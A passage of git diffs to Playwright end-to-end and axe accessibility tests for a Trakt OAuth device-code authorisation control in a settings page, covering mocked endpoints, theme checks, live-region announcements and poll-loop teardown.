+  await openTraktGroupInState(page, pollSuccessResponse(), 'Authorisation successful! Trakt is now connected.');
 }
 
 async function openTraktGroupWithError(page: Page) {
-  await openTraktGroupInState(page, pollErrorResponse(), 'Device code expired. Please start authorization again.');
+  await openTraktGroupInState(page, pollErrorResponse(), 'Device code expired. Please start authorisation again.');
 }
 
 /**
@@ -250,7 +250,12 @@ test.describe('Trakt device authorisation accessibility (FEAT #311)', () => {
     await expect(startButton).not.toHaveAttribute('disabled', '');
 
     await startButton.click();
-    await expect(page.locator('[data-testid="trakt-user-code"]')).toHaveText('ABCD-1234');
+    const codeEl = page.locator('[data-testid="trakt-user-code"]');
+    await expect(codeEl).toHaveText('ABCD-1234');
+    // See the note in trakt-device-auth.spec.ts: toHaveText alone passes on
+    // a code the user cannot see, and the axe scans in this very file skip
+    // hidden subtrees, so they cannot catch it either.
+    await expect(codeEl).toBeVisible();
 
     // Busy: aria-disabled (not the disabled attribute), so it stays in the
     // tab order and a keyboard/AT user can still discover and read it.

--- a/tests/e2e/trakt-device-auth.a11y.spec.ts
+++ b/tests/e2e/trakt-device-auth.a11y.spec.ts
@@ -1,0 +1,155 @@
+import { test, expect } from './fixtures';
+import AxeBuilder from '@axe-core/playwright';
+import { type Page } from '@playwright/test';
+
+/**
+ * Accessibility coverage for the Trakt device authorisation control
+ * (FEAT #311, see trakt-device-auth.spec.ts for the behavioural tests).
+ *
+ * The default "Settings page should be accessible" scan in
+ * accessibility.a11y.spec.ts never reaches this control: settingsPanel()
+ * defaults `activeTab` to 'general' and only renders the active tab's
+ * groups, and the Trakt group's `tab: 'automation'` gets remapped to
+ * 'display' ("Suggestions") -- a tab nobody switches to in that scan. So
+ * this is the only place the code/status region and the start button are
+ * ever scanned, in both themes, per this project's WCAG 2.2 AA floor.
+ *
+ * Follows accessibility.a11y.spec.ts's own dark-theme idiom
+ * (addInitScript before goto, then confirm the theme actually took before
+ * trusting the scan).
+ */
+
+const DEVICE_CODE_ROUTE = /automation\.trakt\.device_code/;
+const POLL_ROUTE = /automation\.trakt\.poll_token/;
+
+function deviceCodeResponse() {
+  return {
+    status: 200,
+    contentType: 'application/json',
+    body: JSON.stringify({
+      success: true,
+      user_code: 'ABCD-1234',
+      verification_url: 'https://trakt.tv/activate',
+      expires_in: 600,
+      interval: 30,
+    }),
+  };
+}
+
+function pollPendingResponse() {
+  return {
+    status: 200,
+    contentType: 'application/json',
+    body: JSON.stringify({ success: false, pending: true, interval: 30 }),
+  };
+}
+
+const WCAG_TAGS = ['wcag2a', 'wcag2aa', 'wcag21a', 'wcag21aa', 'wcag22aa'];
+
+/**
+ * Enable the Trakt group with a Client ID (through the real settings.save
+ * API), reload, switch to the "Suggestions" tab the group actually renders
+ * under (tabRemaps sends `tab: 'automation'` there), start authorisation
+ * against mocked endpoints, and wait for the code to display -- so the scan
+ * below sees the control in its populated, most complex state rather than
+ * its empty resting one.
+ */
+async function openTraktGroupWithCodeDisplayed(page: Page) {
+  await page.route(DEVICE_CODE_ROUTE, (route) => route.fulfill(deviceCodeResponse()));
+  await page.route(POLL_ROUTE, (route) => route.fulfill(pollPendingResponse()));
+
+  await page.goto('/settings/');
+  await expect(page.locator('h1')).toContainText('Settings');
+
+  await page.evaluate(async () => {
+    await fetch(window.CP.apiBase + '/settings.save/?section=trakt&name=automation_enabled&value=true');
+    await fetch(window.CP.apiBase + '/settings.save/?section=trakt&name=automation_client_id&value=e2e-test-client-id');
+  });
+  await page.reload();
+  await expect(page.getByRole('tablist', { name: 'Settings categories' })).toBeVisible();
+
+  const suggestionsTab = page.getByRole('tab', { name: /suggestions/i });
+  await expect(suggestionsTab).toBeVisible();
+  await suggestionsTab.click();
+
+  const startButton = page.locator('[data-testid="trakt-start-auth"]');
+  await expect(startButton).toBeVisible({ timeout: 10000 });
+  await startButton.click();
+
+  await expect(page.locator('[data-testid="trakt-user-code"]')).toHaveText('ABCD-1234');
+}
+
+test.describe('Trakt device authorisation accessibility (FEAT #311)', () => {
+  test('the start button and the populated live region have no WCAG violations (light theme)', async ({ page }) => {
+    await openTraktGroupWithCodeDisplayed(page);
+
+    const results = await new AxeBuilder({ page })
+      .withTags(WCAG_TAGS)
+      .include('[data-testid="trakt-start-auth"]')
+      .include('[data-testid="trakt-auth-status"]')
+      .analyze();
+
+    const detail = results.violations
+      .flatMap((v) => v.nodes.map((n) => `${v.id}: ${n.html} — ${n.failureSummary}`))
+      .join('\n');
+    expect(results.violations.length, `light theme violations:\n${detail}`).toBe(0);
+  });
+
+  test('the start button and the populated live region have no WCAG violations (dark theme)', async ({ page }) => {
+    await page.addInitScript((t) => {
+      localStorage.setItem('cp-theme', t);
+    }, 'dark');
+
+    await openTraktGroupWithCodeDisplayed(page);
+
+    // Load-bearing, not decorative: confirms the scan below is actually
+    // reading the dark theme rather than silently falling back to light.
+    await expect
+      .poll(() => page.evaluate(() => document.documentElement.classList.contains('light')))
+      .toBe(false);
+
+    const results = await new AxeBuilder({ page })
+      .withTags(WCAG_TAGS)
+      .include('[data-testid="trakt-start-auth"]')
+      .include('[data-testid="trakt-auth-status"]')
+      .analyze();
+
+    const detail = results.violations
+      .flatMap((v) => v.nodes.map((n) => `${v.id}: ${n.html} — ${n.failureSummary}`))
+      .join('\n');
+    expect(results.violations.length, `dark theme violations:\n${detail}`).toBe(0);
+  });
+
+  test('the button label leads with its visible text and the button stays focusable while busy (WCAG 2.5.3 / 2.1.1)', async ({ page }) => {
+    await page.route(DEVICE_CODE_ROUTE, (route) => route.fulfill(deviceCodeResponse()));
+    await page.route(POLL_ROUTE, (route) => route.fulfill(pollPendingResponse()));
+
+    await page.goto('/settings/');
+    await expect(page.locator('h1')).toContainText('Settings');
+    await page.evaluate(async () => {
+      await fetch(window.CP.apiBase + '/settings.save/?section=trakt&name=automation_enabled&value=true');
+      await fetch(window.CP.apiBase + '/settings.save/?section=trakt&name=automation_client_id&value=e2e-test-client-id');
+    });
+    await page.reload();
+    await expect(page.getByRole('tablist', { name: 'Settings categories' })).toBeVisible();
+    await page.getByRole('tab', { name: /suggestions/i }).click();
+
+    const startButton = page.locator('[data-testid="trakt-start-auth"]');
+    await expect(startButton).toBeVisible({ timeout: 10000 });
+
+    // Resting-state accessible name is exactly the visible text, computed
+    // from content rather than an aria-label that could drift from it.
+    await expect(startButton).toHaveAccessibleName('Start Trakt Authorisation');
+    await expect(startButton).not.toHaveAttribute('disabled', '');
+
+    await startButton.click();
+    await expect(page.locator('[data-testid="trakt-user-code"]')).toHaveText('ABCD-1234');
+
+    // Busy: aria-disabled (not the disabled attribute), so it stays in the
+    // tab order and a keyboard/AT user can still discover and read it.
+    await expect(startButton).toHaveAttribute('aria-disabled', 'true');
+    await expect(startButton).not.toHaveAttribute('disabled', '');
+    await startButton.focus();
+    await expect(startButton).toBeFocused();
+  });
+});

--- a/tests/e2e/trakt-device-auth.a11y.spec.ts
+++ b/tests/e2e/trakt-device-auth.a11y.spec.ts
@@ -92,6 +92,8 @@ async function expectThemeIsInEffect(page: Page, theme: 'light' | 'dark') {
  * wait for `expectedStatus` to appear in the live region -- so a scan can
  * target whichever state (pending/success/error) it was called for.
  */
+const CODE = 'ABCD-1234';
+
 async function openTraktGroupInState(
   page: Page,
   pollResponse: ReturnType<typeof pollPendingResponse>,
@@ -118,11 +120,25 @@ async function openTraktGroupInState(
   await expect(startButton).toBeVisible({ timeout: 10000 });
   await startButton.click();
 
-  await expect(page.locator('[data-testid="trakt-auth-status"]')).toContainText(expectedStatus, { timeout: 8000 });
+  // Visible, not merely present: textContent survives display:none, so a
+  // text-only wait would let every axe scan below run against a state the
+  // user cannot see, and axe skips hidden subtrees, which turns zero
+  // violations into nothing scanned.
+  //
+  // The device code and the status message are DIFFERENT elements, so the
+  // wait has to name the one that actually carries the text. Waiting for the
+  // code on the message paragraph is how this helper failed once already:
+  // the paragraph legitimately reads "Waiting for authorisation" at that
+  // moment, so the assertion was simply pointed at the wrong node.
+  const target = page.locator(
+    expectedStatus === CODE ? '[data-testid="trakt-user-code"]' : '[data-testid="trakt-auth-message"]',
+  );
+  await expect(target).toBeVisible({ timeout: 8000 });
+  await expect(target).toContainText(expectedStatus);
 }
 
 async function openTraktGroupWithCodeDisplayed(page: Page) {
-  await openTraktGroupInState(page, pollPendingResponse(), 'ABCD-1234');
+  await openTraktGroupInState(page, pollPendingResponse(), CODE);
 }
 
 async function openTraktGroupWithSuccess(page: Page) {

--- a/tests/e2e/trakt-device-auth.a11y.spec.ts
+++ b/tests/e2e/trakt-device-auth.a11y.spec.ts
@@ -44,19 +44,61 @@ function pollPendingResponse() {
   };
 }
 
+function pollSuccessResponse() {
+  return {
+    status: 200,
+    contentType: 'application/json',
+    body: JSON.stringify({
+      success: true,
+      message: 'Authorization successful! Trakt is now connected.',
+    }),
+  };
+}
+
+function pollErrorResponse() {
+  return {
+    status: 200,
+    contentType: 'application/json',
+    body: JSON.stringify({
+      success: false,
+      error: 'Device code expired. Please start authorization again.',
+    }),
+  };
+}
+
 const WCAG_TAGS = ['wcag2a', 'wcag2aa', 'wcag21a', 'wcag21aa', 'wcag22aa'];
+
+/**
+ * Confirm the theme actually took before trusting a scan run under it --
+ * load-bearing, not decorative, per accessibility.a11y.spec.ts's own
+ * dark-theme idiom. Light is `classList.contains('light') === true`: with no
+ * `cp-theme` in localStorage, base.html's init falls through to
+ * `prefers-color-scheme`, and playwright.config.ts pins the accessibility
+ * project's colour scheme to light -- but that pin is what makes the
+ * fallthrough land on light, not a fact this file could otherwise see, so a
+ * light-theme test must assert the class exists rather than assume it.
+ */
+async function expectThemeIsInEffect(page: Page, theme: 'light' | 'dark') {
+  await expect
+    .poll(() => page.evaluate(() => document.documentElement.classList.contains('light')))
+    .toBe(theme === 'light');
+}
 
 /**
  * Enable the Trakt group with a Client ID (through the real settings.save
  * API), reload, switch to the "Suggestions" tab the group actually renders
  * under (tabRemaps sends `tab: 'automation'` there), start authorisation
- * against mocked endpoints, and wait for the code to display -- so the scan
- * below sees the control in its populated, most complex state rather than
- * its empty resting one.
+ * against a mocked device_code endpoint and the given poll response, and
+ * wait for `expectedStatus` to appear in the live region -- so a scan can
+ * target whichever state (pending/success/error) it was called for.
  */
-async function openTraktGroupWithCodeDisplayed(page: Page) {
+async function openTraktGroupInState(
+  page: Page,
+  pollResponse: ReturnType<typeof pollPendingResponse>,
+  expectedStatus: string,
+) {
   await page.route(DEVICE_CODE_ROUTE, (route) => route.fulfill(deviceCodeResponse()));
-  await page.route(POLL_ROUTE, (route) => route.fulfill(pollPendingResponse()));
+  await page.route(POLL_ROUTE, (route) => route.fulfill(pollResponse));
 
   await page.goto('/settings/');
   await expect(page.locator('h1')).toContainText('Settings');
@@ -76,23 +118,61 @@ async function openTraktGroupWithCodeDisplayed(page: Page) {
   await expect(startButton).toBeVisible({ timeout: 10000 });
   await startButton.click();
 
-  await expect(page.locator('[data-testid="trakt-user-code"]')).toHaveText('ABCD-1234');
+  await expect(page.locator('[data-testid="trakt-auth-status"]')).toContainText(expectedStatus, { timeout: 8000 });
+}
+
+async function openTraktGroupWithCodeDisplayed(page: Page) {
+  await openTraktGroupInState(page, pollPendingResponse(), 'ABCD-1234');
+}
+
+async function openTraktGroupWithSuccess(page: Page) {
+  await openTraktGroupInState(page, pollSuccessResponse(), 'Authorization successful! Trakt is now connected.');
+}
+
+async function openTraktGroupWithError(page: Page) {
+  await openTraktGroupInState(page, pollErrorResponse(), 'Device code expired. Please start authorization again.');
+}
+
+/**
+ * Run the standard WCAG scan over the start button and the live region,
+ * asserting a violation-free result with the violations themselves in the
+ * failure message.
+ */
+async function scanTraktControl(page: Page, label: string) {
+  const results = await new AxeBuilder({ page })
+    .withTags(WCAG_TAGS)
+    .include('[data-testid="trakt-start-auth"]')
+    .include('[data-testid="trakt-auth-status"]')
+    .analyze();
+
+  const detail = results.violations
+    .flatMap((v) => v.nodes.map((n) => `${v.id}: ${n.html} - ${n.failureSummary}`))
+    .join('\n');
+  expect(results.violations.length, `${label} violations:\n${detail}`).toBe(0);
 }
 
 test.describe('Trakt device authorisation accessibility (FEAT #311)', () => {
+  // L2: both endpoints are mocked per test below, which is discipline, not a
+  // guard -- a forgotten mock (or a future edit that calls Trakt directly
+  // from the browser) must fail loudly rather than making a real, slow
+  // outbound call during a test run. Load-bearing proof lives with the
+  // sibling test in trakt-device-auth.spec.ts, since the mechanism is
+  // identical in both files.
+  test.beforeEach(async ({ page }) => {
+    await page.route('**://api.trakt.tv/**', (route) => route.abort());
+  });
+
   test('the start button and the populated live region have no WCAG violations (light theme)', async ({ page }) => {
     await openTraktGroupWithCodeDisplayed(page);
 
-    const results = await new AxeBuilder({ page })
-      .withTags(WCAG_TAGS)
-      .include('[data-testid="trakt-start-auth"]')
-      .include('[data-testid="trakt-auth-status"]')
-      .analyze();
+    // L3: this scan ran under "light theme" in name only -- nothing here
+    // ever confirmed light actually rendered, and it only passed because
+    // playwright.config.ts pins colorScheme to 'light' for this project. If
+    // that pin ever moves, this becomes a silent second dark scan under a
+    // "light theme" name.
+    await expectThemeIsInEffect(page, 'light');
 
-    const detail = results.violations
-      .flatMap((v) => v.nodes.map((n) => `${v.id}: ${n.html} — ${n.failureSummary}`))
-      .join('\n');
-    expect(results.violations.length, `light theme violations:\n${detail}`).toBe(0);
+    await scanTraktControl(page, 'light theme (pending code)');
   });
 
   test('the start button and the populated live region have no WCAG violations (dark theme)', async ({ page }) => {
@@ -101,23 +181,50 @@ test.describe('Trakt device authorisation accessibility (FEAT #311)', () => {
     }, 'dark');
 
     await openTraktGroupWithCodeDisplayed(page);
+    await expectThemeIsInEffect(page, 'dark');
 
-    // Load-bearing, not decorative: confirms the scan below is actually
-    // reading the dark theme rather than silently falling back to light.
-    await expect
-      .poll(() => page.evaluate(() => document.documentElement.classList.contains('light')))
-      .toBe(false);
+    await scanTraktControl(page, 'dark theme (pending code)');
+  });
 
-    const results = await new AxeBuilder({ page })
-      .withTags(WCAG_TAGS)
-      .include('[data-testid="trakt-start-auth"]')
-      .include('[data-testid="trakt-auth-status"]')
-      .analyze();
+  // L3: neither pre-existing scan above ever reached the success or error
+  // state, both of which use text-cp-success / text-cp-danger
+  // (scripts.html's showSuccess()/showError()) -- the same tokens that
+  // needed a light-mode override in base.html after a dark success toast
+  // shipped at 3.30:1 contrast. Cover both states in both themes.
+  test('the success state has no WCAG violations (light theme)', async ({ page }) => {
+    await openTraktGroupWithSuccess(page);
+    await expectThemeIsInEffect(page, 'light');
 
-    const detail = results.violations
-      .flatMap((v) => v.nodes.map((n) => `${v.id}: ${n.html} — ${n.failureSummary}`))
-      .join('\n');
-    expect(results.violations.length, `dark theme violations:\n${detail}`).toBe(0);
+    await scanTraktControl(page, 'light theme (success)');
+  });
+
+  test('the success state has no WCAG violations (dark theme)', async ({ page }) => {
+    await page.addInitScript((t) => {
+      localStorage.setItem('cp-theme', t);
+    }, 'dark');
+
+    await openTraktGroupWithSuccess(page);
+    await expectThemeIsInEffect(page, 'dark');
+
+    await scanTraktControl(page, 'dark theme (success)');
+  });
+
+  test('the error state has no WCAG violations (light theme)', async ({ page }) => {
+    await openTraktGroupWithError(page);
+    await expectThemeIsInEffect(page, 'light');
+
+    await scanTraktControl(page, 'light theme (error)');
+  });
+
+  test('the error state has no WCAG violations (dark theme)', async ({ page }) => {
+    await page.addInitScript((t) => {
+      localStorage.setItem('cp-theme', t);
+    }, 'dark');
+
+    await openTraktGroupWithError(page);
+    await expectThemeIsInEffect(page, 'dark');
+
+    await scanTraktControl(page, 'dark theme (error)');
   });
 
   test('the button label leads with its visible text and the button stays focusable while busy (WCAG 2.5.3 / 2.1.1)', async ({ page }) => {

--- a/tests/e2e/trakt-device-auth.spec.ts
+++ b/tests/e2e/trakt-device-auth.spec.ts
@@ -57,7 +57,7 @@ function pollSuccessResponse() {
     contentType: 'application/json',
     body: JSON.stringify({
       success: true,
-      message: 'Authorization successful! Trakt is now connected.',
+      message: 'Authorisation successful! Trakt is now connected.',
     }),
   };
 }
@@ -128,6 +128,46 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     expect(outcome).not.toBe('reached-the-network');
   });
 
+  test('the busy state is announced in the live region, not only on the button label (WCAG 4.1.3)', async ({ page }) => {
+    const startButton = await openTraktGroup(page);
+    const status = page.locator('[data-testid="trakt-auth-status"]');
+
+    // Hold the device_code response open so the busy window is observable.
+    // Against real Trakt this window is genuinely seconds, not milliseconds:
+    // the server handler allows a 30s timeout on its outbound call.
+    let release: () => void = () => {};
+    const held = new Promise<void>((resolve) => { release = resolve; });
+    await page.route(DEVICE_CODE_ROUTE, async (route) => {
+      await held;
+      return route.fulfill(deviceCodeResponse({ interval: 30 }));
+    });
+    await page.route(POLL_ROUTE, (route) => route.fulfill(pollPendingResponse(30)));
+
+    // Not toHaveText(''): the code box's own template text is in textContent
+    // even while hidden, which is exactly the blindness these specs had.
+    await expect(status).not.toContainText('Contacting Trakt');
+    await startButton.click();
+
+    // The point of the test: the region a screen reader is listening to says
+    // something while we are waiting. The button's own label also changes,
+    // but that is only read if focus happens to be on the button.
+    await expect(status).toContainText('Contacting Trakt', { timeout: 8000 });
+
+    release();
+    await expect(status).toContainText('ABCD-1234', { timeout: 8000 });
+  });
+
+  test('the button points at the status region, so its unavailable state has a reason (WCAG 1.3.1)', async ({ page }) => {
+    const startButton = await openTraktGroup(page);
+
+    // aria-disabled without aria-describedby reads as "unavailable" with the
+    // reason sitting in an unassociated element, for up to the full ten
+    // minute poll window.
+    const describedBy = await startButton.getAttribute('aria-describedby');
+    expect(describedBy).toBe('trakt-auth-status');
+    await expect(page.locator(`#${describedBy}`)).toHaveAttribute('role', 'status');
+  });
+
   test('starting authorisation displays the code and URL inside a persistent live region', async ({ page }) => {
     const startButton = await openTraktGroup(page);
 
@@ -156,8 +196,20 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     await expect(status).toContainText('ABCD-1234');
     const codeEl = status.locator('[data-testid="trakt-user-code"]');
     await expect(codeEl).toHaveText('ABCD-1234');
+    // VISIBLE, not merely present. toHaveText and toContainText read
+    // textContent, which display:none does not affect, so every assertion
+    // above this line passes on a control the user cannot see. Proven: with
+    // `x-show="userCode"` mutated to `x-show="false"`, so the code a user
+    // must type into trakt.tv can never appear and the feature is unusable,
+    // all 13 tests across both spec files stayed green. The axe scans miss
+    // it too, because axe skips hidden subtrees, so "zero violations"
+    // quietly degrades from "this control is clean" to "nothing was
+    // scanned". This assertion and its siblings below are the only things
+    // in either file that can fail on that mutation.
+    await expect(codeEl).toBeVisible();
 
     const link = status.locator('[data-testid="trakt-verification-url"]');
+    await expect(link).toBeVisible();
     await expect(link).toHaveAttribute('href', 'https://trakt.tv/activate');
     await expect(link).toHaveAttribute('target', '_blank');
     await expect(link).toHaveAttribute('rel', /noopener/);
@@ -227,7 +279,7 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     // displays the code and URL...'), which mocks a PENDING poll on a 30s
     // interval so the code is genuinely stable while it is asserted. This test
     // is about the success path, so it asserts only that.
-    await expect(status).toContainText('Authorization successful! Trakt is now connected.', { timeout: 8000 });
+    await expect(status).toContainText('Authorisation successful! Trakt is now connected.', { timeout: 8000 });
     // The device code is no longer relevant once authorisation succeeded.
     await expect(status).not.toContainText('ABCD-1234');
     expect(pollRequests).toBeGreaterThanOrEqual(1);
@@ -254,7 +306,7 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     let pollRequests = 0;
     await page.route(POLL_ROUTE, (route) => {
       pollRequests++;
-      return route.fulfill(pollErrorResponse('Device code expired. Please start authorization again.'));
+      return route.fulfill(pollErrorResponse('Device code expired. Please start authorisation again.'));
     });
 
     await startButton.click();
@@ -267,7 +319,7 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     // just under gate load. The code display has its own stable-window test
     // above, which mocks a PENDING poll on a 30s interval. This test is
     // about the error path, so it asserts only that.
-    await expect(status).toContainText('Device code expired. Please start authorization again.', { timeout: 8000 });
+    await expect(status).toContainText('Device code expired. Please start authorisation again.', { timeout: 8000 });
     await expect(status).not.toContainText('ABCD-1234');
 
     const requestsAtError = pollRequests;
@@ -299,7 +351,7 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     // from start()/showSuccess()/showError(). A second "Start Authorisation"
     // click back on this tab then raced the orphaned chain: whichever one
     // consumed the device code on trakt.tv's side succeeded, and the other
-    // read back "No device code. Start authorization first." -- reporting
+    // read back "No device code. Start authorisation first." -- reporting
     // failure to a user whose authorisation had actually succeeded.
     const startButton = await openTraktGroup(page);
     const status = page.locator('[data-testid="trakt-auth-status"]');
@@ -332,6 +384,61 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     // elapsed. Read only after the bounded wait, not at the same instant as
     // the navigation -- a request already in flight at navigation time would
     // otherwise be misread as the loop continuing.
+    await page.waitForTimeout(3000);
+
+    expect(pollRequests).toBe(countAtNavigation);
+  });
+
+  test('H1: a poll still IN FLIGHT at teardown does not resurrect the loop', async ({ page }) => {
+    // The sibling test above cannot see this. Its mock answers instantly, so
+    // at navigation the component is always in the timer-pending state, and
+    // its own comment says an in-flight request "would otherwise be misread
+    // as the loop continuing" -- it was written to tolerate the exact case
+    // that was broken. destroy() clears pollTimer, which cancels a poll that
+    // has not started; it does nothing about a fetch already open. poll()
+    // then resumed after its await on a torn-down component and scheduled
+    // the next one, restarting the chain. Measured before the fix: three
+    // further polls after teardown.
+    //
+    // In production the in-flight window is most of every cycle, not a
+    // sliver: pollForToken makes a blocking outbound call to Trakt with a
+    // 30 second timeout against a 5 second poll interval.
+    const startButton = await openTraktGroup(page);
+    const status = page.locator('[data-testid="trakt-auth-status"]');
+
+    await page.route(DEVICE_CODE_ROUTE, (route) => route.fulfill(deviceCodeResponse({ interval: 1 })));
+
+    let pollRequests = 0;
+    let releaseHeldPoll: (() => void) | null = null;
+    await page.route(POLL_ROUTE, async (route) => {
+      pollRequests++;
+      // Hold the SECOND poll open across the navigation, so teardown happens
+      // while a request is genuinely in flight. The first is answered
+      // normally so the loop is demonstrably running before the trigger.
+      if (pollRequests === 2) {
+        await new Promise<void>((resolve) => {
+          releaseHeldPoll = resolve;
+        });
+      }
+      return route.fulfill(pollPendingResponse(1));
+    });
+
+    await startButton.click();
+    await expect(status).toContainText('ABCD-1234');
+    await expect.poll(() => pollRequests, { timeout: 5000 }).toBe(2);
+
+    // Tear the component down while poll #2 is still open.
+    await page.getByRole('tab', { name: /^general$/i }).click();
+    await expect(page.locator('[data-testid="trakt-start-auth"]')).not.toBeAttached();
+
+    // Now let the held response land on the destroyed component.
+    expect(releaseHeldPoll).not.toBeNull();
+    (releaseHeldPoll as unknown as () => void)();
+
+    const countAtNavigation = pollRequests;
+
+    // Three seconds is at least two more 1s intervals. If the resumed poll
+    // schedules another, this goes above countAtNavigation.
     await page.waitForTimeout(3000);
 
     expect(pollRequests).toBe(countAtNavigation);

--- a/tests/e2e/trakt-device-auth.spec.ts
+++ b/tests/e2e/trakt-device-auth.spec.ts
@@ -263,6 +263,80 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     expect(deviceCodeRequests).toBe(1);
   });
 
+  test('the first poll waits for the interval instead of firing immediately', async ({ page }) => {
+    const startButton = await openTraktGroup(page);
+
+    // Trakt's interval is the MINIMUM gap between token requests, and the
+    // user cannot have typed a code that appeared a moment ago, so an
+    // immediate first poll is guaranteed to fail. It also invites the 429
+    // slow-down, which doubles the interval for every later poll, making the
+    // one request that could never succeed slow down the rest of the flow.
+    await page.route(DEVICE_CODE_ROUTE, (route) =>
+      route.fulfill(deviceCodeResponse({ interval: 3 })));
+
+    let pollRequests = 0;
+    await page.route(POLL_ROUTE, (route) => {
+      pollRequests++;
+      return route.fulfill(pollPendingResponse(3));
+    });
+
+    await startButton.click();
+    await expectCodeShown(page);
+
+    // The code is on screen and no poll has gone out yet. Read after a
+    // bounded wait well inside the interval, not at the instant of the click:
+    // asserting at the same moment cannot tell "not yet" from "never".
+    await page.waitForTimeout(1200);
+    expect(pollRequests).toBe(0);
+
+    // And it does start, so this is a delay rather than a wall.
+    await expect.poll(() => pollRequests, { timeout: 8000 }).toBeGreaterThanOrEqual(1);
+  });
+
+  test('a credential typed a moment ago is saved before authorisation starts', async ({ page }) => {
+    const startButton = await openTraktGroup(page);
+
+    // Settings save on a 500ms debounce. Someone setting Trakt up types the
+    // secret and clicks Start, well inside that window, so without a flush
+    // the device code is requested using whatever the server had BEFORE the
+    // edit: reported as missing while visibly on screen.
+    let sawSecretSave = false;
+    let secretSavedBeforeDeviceCode = false;
+    let deviceCodeRequested = false;
+
+    await page.route(/settings\.save/, async (route) => {
+      const body = route.request().postData() || route.request().url();
+      if (body.includes('automation_client_secret')) {
+        sawSecretSave = true;
+        if (!deviceCodeRequested) secretSavedBeforeDeviceCode = true;
+      }
+      return route.continue();
+    });
+    await page.route(DEVICE_CODE_ROUTE, (route) => {
+      deviceCodeRequested = true;
+      return route.fulfill(deviceCodeResponse({ interval: 30 }));
+    });
+    await page.route(POLL_ROUTE, (route) => route.fulfill(pollPendingResponse(30)));
+
+    // Password fields carry no name attribute; they are reached by their
+    // accessible label (field_types.html binds :aria-label from opt.label),
+    // and they save on @change, which fires on blur, so the click below is
+    // what commits the edit and starts the 500ms debounce.
+    const secretField = page.getByLabel('Client Secret', { exact: true });
+    await expect(secretField).toBeVisible({ timeout: 10000 });
+    await secretField.fill('typed-just-now-secret');
+
+    // Immediately, inside the debounce window. That is the whole point.
+    await startButton.click();
+
+    await expect.poll(() => deviceCodeRequested, { timeout: 8000 }).toBe(true);
+    expect(sawSecretSave, 'the typed secret was never saved').toBe(true);
+    expect(
+      secretSavedBeforeDeviceCode,
+      'the device code was requested before the typed credential reached the server',
+    ).toBe(true);
+  });
+
   test('a pending poll response keeps the control polling', async ({ page }) => {
     const startButton = await openTraktGroup(page);
     const status = page.locator('[data-testid="trakt-auth-status"]');

--- a/tests/e2e/trakt-device-auth.spec.ts
+++ b/tests/e2e/trakt-device-auth.spec.ts
@@ -1,0 +1,247 @@
+import { test, expect } from './fixtures';
+import { type Page } from '@playwright/test';
+
+/**
+ * FEAT #311: the Trakt watchlist automation's OAuth device code flow, which
+ * the shipped new UI has never been able to start (the four backend views
+ * exist -- automation.trakt.auth_url / device_code / poll_token /
+ * credentials -- but their only caller was trakt.js in the unserved legacy
+ * UI). This pins the bespoke control added for it
+ * (partials/settings/trakt_auth.html + scripts.html's traktDeviceAuth()),
+ * a deliberate one-off rather than a mode on the shared buttonField helper,
+ * because that helper is single-shot (fetch, show a message, refresh) and
+ * this flow needs a start call followed by a bounded poll loop.
+ *
+ * Mocked at the API boundary (automation.trakt.device_code /
+ * automation.trakt.poll_token) via route interception, same idiom as
+ * operator-replace-modal.spec.ts uses for renamer.operator_candidates /
+ * renamer.operator_replace -- the flow talks to a third party (Trakt) and
+ * is only reachable with a Client ID configured, neither of which this
+ * suite can or should provide for real.
+ *
+ * The Trakt group's config declares `tab: 'automation'`, which
+ * scripts.html's `tabRemaps` sends to the tab whose internal key is
+ * `display` and whose visible label is "Suggestions" -- so the group is
+ * reached via that tab, not one literally named "Automation" or "Trakt".
+ */
+
+const DEVICE_CODE_ROUTE = /automation\.trakt\.device_code/;
+const POLL_ROUTE = /automation\.trakt\.poll_token/;
+
+function deviceCodeResponse(overrides: Record<string, unknown> = {}) {
+  return {
+    status: 200,
+    contentType: 'application/json',
+    body: JSON.stringify({
+      success: true,
+      user_code: 'ABCD-1234',
+      verification_url: 'https://trakt.tv/activate',
+      expires_in: 600,
+      interval: 1,
+      ...overrides,
+    }),
+  };
+}
+
+function pollPendingResponse(interval = 1) {
+  return {
+    status: 200,
+    contentType: 'application/json',
+    body: JSON.stringify({ success: false, pending: true, interval }),
+  };
+}
+
+function pollSuccessResponse() {
+  return {
+    status: 200,
+    contentType: 'application/json',
+    body: JSON.stringify({
+      success: true,
+      message: 'Authorization successful! Trakt is now connected.',
+    }),
+  };
+}
+
+function pollErrorResponse(error: string) {
+  return {
+    status: 200,
+    contentType: 'application/json',
+    body: JSON.stringify({ success: false, error }),
+  };
+}
+
+/**
+ * Navigate to Settings, enable the Trakt automation group and give it a
+ * Client ID (through the real settings.save API, same as
+ * operator-replace-modal.spec.ts's gotoReviewMovie flips its own gate),
+ * reload so the group renders open, then land on the tab that actually
+ * carries it -- "Suggestions", per tabRemaps above, not "Automation".
+ * Returns the group's Start Authorisation button.
+ */
+async function openTraktGroup(page: Page) {
+  await page.goto('/settings/');
+  await expect(page.locator('h1')).toContainText('Settings');
+
+  await page.evaluate(async () => {
+    await fetch(window.CP.apiBase + '/settings.save/?section=trakt&name=automation_enabled&value=true');
+    await fetch(window.CP.apiBase + '/settings.save/?section=trakt&name=automation_client_id&value=e2e-test-client-id');
+  });
+  await page.reload();
+  await expect(page.locator('h1')).toContainText('Settings');
+
+  const suggestionsTab = page.getByRole('tab', { name: /suggestions/i });
+  await expect(suggestionsTab).toBeVisible();
+  await suggestionsTab.click();
+
+  const startButton = page.locator('[data-testid="trakt-start-auth"]');
+  await expect(startButton).toBeVisible({ timeout: 10000 });
+  return startButton;
+}
+
+test.describe('Trakt device authorisation (FEAT #311)', () => {
+  test('starting authorisation displays the code and URL inside a persistent live region', async ({ page }) => {
+    const startButton = await openTraktGroup(page);
+
+    // The live region exists, and carries its ARIA contract, BEFORE any
+    // action -- this is the whole point of "persistent": nothing conjures
+    // it into existence alongside the code it will later show.
+    const status = page.locator('[data-testid="trakt-auth-status"]');
+    await expect(status).toBeAttached();
+    await expect(status).toHaveAttribute('role', 'status');
+    await expect(status).toHaveAttribute('aria-live', 'polite');
+    await expect(status).not.toContainText('ABCD-1234');
+
+    let deviceCodeRequests = 0;
